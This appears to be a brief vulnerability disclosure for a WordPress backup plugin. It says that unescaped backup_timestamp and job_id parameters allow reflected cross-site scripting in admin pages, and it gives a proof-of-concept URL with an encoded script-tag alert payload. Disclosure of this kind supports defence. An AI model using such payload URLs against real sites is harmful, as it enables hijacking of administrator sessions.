The plugin does not sanitise and escape the backup_timestamp and job_id parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/options-general.php?page=updraftplus&backup_timestamp=%3Cscript%3Ealert%28/XSS/%29%3B%3C%2Fscript%3E&action=updraft_restore